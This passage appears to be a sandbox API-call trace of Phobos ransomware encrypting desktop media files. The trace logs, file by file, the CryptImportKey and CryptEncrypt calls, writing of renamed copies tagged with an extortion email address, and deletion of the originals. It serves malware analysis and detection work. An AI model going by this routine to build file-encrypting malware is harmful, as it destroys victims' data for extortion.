HALPmcxz\\Desktop\\o4Djq-x2uVL\\20AsLgTrMkZkMHopn.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\20aslgtrmkzkmhopn.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\20AsLgTrMkZkMHopn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\20aslgtrmkzkmhopn.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.923] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.923] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\20AsLgTrMkZkMHopn.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\20aslgtrmkzkmhopn.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.924] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.924] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.924] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf8c6, lpOverlapped=0x0) returned 1 [0195.926] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf8d0, dwBufLen=0xf8d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf8d0) returned 1 [0195.927] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf8d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf8d0, lpOverlapped=0x0) returned 1 [0195.929] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0195.929] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.929] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0195.929] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.929] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0195.929] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.929] CloseHandle (hObject=0x134) returned 1 [0195.929] CloseHandle (hObject=0x180) returned 1 [0195.929] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\20AsLgTrMkZkMHopn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\20aslgtrmkzkmhopn.m4a")) returned 1 [0195.931] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\bj6Rh0jlc4r77afRHZ4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\bj6rh0jlc4r77afrhz4.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.931] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=9542) returned 1 [0195.931] CloseHandle (hObject=0x180) returned 1 [0195.932] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\bj6Rh0jlc4r77afRHZ4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\bj6rh0jlc4r77afrhz4.wav")) returned 0x20 [0195.932] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\bj6Rh0jlc4r77afRHZ4.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\bj6rh0jlc4r77afrhz4.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\bj6Rh0jlc4r77afRHZ4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\bj6rh0jlc4r77afrhz4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.932] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.932] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\bj6Rh0jlc4r77afRHZ4.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\bj6rh0jlc4r77afrhz4.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.933] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.933] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.933] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2546, lpOverlapped=0x0) returned 1 [0195.934] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2550, dwBufLen=0x2550 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2550) returned 1 [0195.934] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2550, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2550, lpOverlapped=0x0) returned 1 [0195.935] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0195.935] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.935] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0195.935] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.935] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0195.936] CryptDestroyKey (hKey=0xa32d28) returned 1 [0195.936] CloseHandle (hObject=0x180) returned 1 [0195.936] CloseHandle (hObject=0x134) returned 1 [0195.936] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\bj6Rh0jlc4r77afRHZ4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\bj6rh0jlc4r77afrhz4.wav")) returned 1 [0195.937] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0195.937] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\Lt_a1ygkTVSs46R6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\lt_a1ygktvss46r6.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.938] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=87617) returned 1 [0195.938] CloseHandle (hObject=0x134) returned 1 [0195.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\Lt_a1ygkTVSs46R6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\lt_a1ygktvss46r6.wav")) returned 0x20 [0195.938] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\Lt_a1ygkTVSs46R6.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\lt_a1ygktvss46r6.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\Lt_a1ygkTVSs46R6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\lt_a1ygktvss46r6.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0195.938] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.938] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0195.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\Lt_a1ygkTVSs46R6.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\lt_a1ygktvss46r6.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0195.940] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0195.940] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0195.940] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x15641, lpOverlapped=0x0) returned 1 [0195.943] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x15650, dwBufLen=0x15650 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x15650) returned 1 [0195.944] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x15650, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x15650, lpOverlapped=0x0) returned 1 [0196.002] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0196.002] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.002] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0196.002] CryptDestroyKey (hKey=0xa32c28) returned 1 [0196.002] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0196.002] CryptDestroyKey (hKey=0xa32d28) returned 1 [0196.002] CloseHandle (hObject=0x134) returned 1 [0196.002] CloseHandle (hObject=0x180) returned 1 [0196.002] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Djq-x2uVL\\Lt_a1ygkTVSs46R6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4djq-x2uvl\\lt_a1ygktvss46r6.wav")) returned 1 [0196.004] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\Px2oRZW0ju4eRHrT4Mm.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\px2orzw0ju4erhrt4mm.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.005] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=14280) returned 1 [0196.005] CloseHandle (hObject=0x180) returned 1 [0196.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\Px2oRZW0ju4eRHrT4Mm.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\px2orzw0ju4erhrt4mm.bmp")) returned 0x20 [0196.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\Px2oRZW0ju4eRHrT4Mm.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\px2orzw0ju4erhrt4mm.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\Px2oRZW0ju4eRHrT4Mm.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\px2orzw0ju4erhrt4mm.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.006] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.006] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\Px2oRZW0ju4eRHrT4Mm.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\px2orzw0ju4erhrt4mm.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0196.007] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0196.007] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.007] ReadFile (in: hFile=0x180, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x37c8, lpOverlapped=0x0) returned 1 [0196.008] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x37d0, dwBufLen=0x37d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x37d0) returned 1 [0196.008] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x37d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x37d0, lpOverlapped=0x0) returned 1 [0196.009] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0196.009] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.009] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0196.009] CryptDestroyKey (hKey=0xa32c28) returned 1 [0196.009] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0196.010] CryptDestroyKey (hKey=0xa32d28) returned 1 [0196.010] CloseHandle (hObject=0x180) returned 1 [0196.010] CloseHandle (hObject=0x134) returned 1 [0196.010] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\Px2oRZW0ju4eRHrT4Mm.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\px2orzw0ju4erhrt4mm.bmp")) returned 1 [0196.011] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\vCSx2uj4.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\vcsx2uj4.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0196.012] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=83174) returned 1 [0196.012] CloseHandle (hObject=0x134) returned 1 [0196.012] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\vCSx2uj4.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\vcsx2uj4.png")) returned 0x20 [0196.012] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\vCSx2uj4.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\vcsx2uj4.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\vCSx2uj4.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\vcsx2uj4.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0196.012] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.012] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0196.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\vCSx2uj4.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\vcsx2uj4.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.013] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d28) returned 1 [0196.013] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.013] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x144e6, lpOverlapped=0x0) returned 1 [0196.015] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x144f0, dwBufLen=0x144f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x144f0) returned 1 [0196.015] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x144f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x144f0, lpOverlapped=0x0) returned 1 [0196.017] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0196.017] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0196.017] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0196.017] CryptDestroyKey (hKey=0xa32c28) returned 1 [0196.017] WriteFile (in: hFile=0x180, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0196.017] CryptDestroyKey (hKey=0xa32d28) returned 1 [0196.017] CloseHandle (hObject=0x134) returned 1 [0196.017] CloseHandle (hObject=0x180) returned 1 [0196.018] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\vCSx2uj4.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\vcsx2uj4.png")) returned 1 [0196.019] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0196.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\zBP9e1bnfyQ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\zbp9e1bnfyq.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0196.020] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=28800) returned 1 [0196.020] CloseHandle (hObject=0x180) returned 1 [0196.020] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\zBP9e1bnfyQ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\zbp9e1bnfyq.mkv")) returned 0x20 [0196.020] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OZnEXi rpCg2\\zBP9e1bnfyQ.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oznexi rpcg2\\zbp9e1bnfyq.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 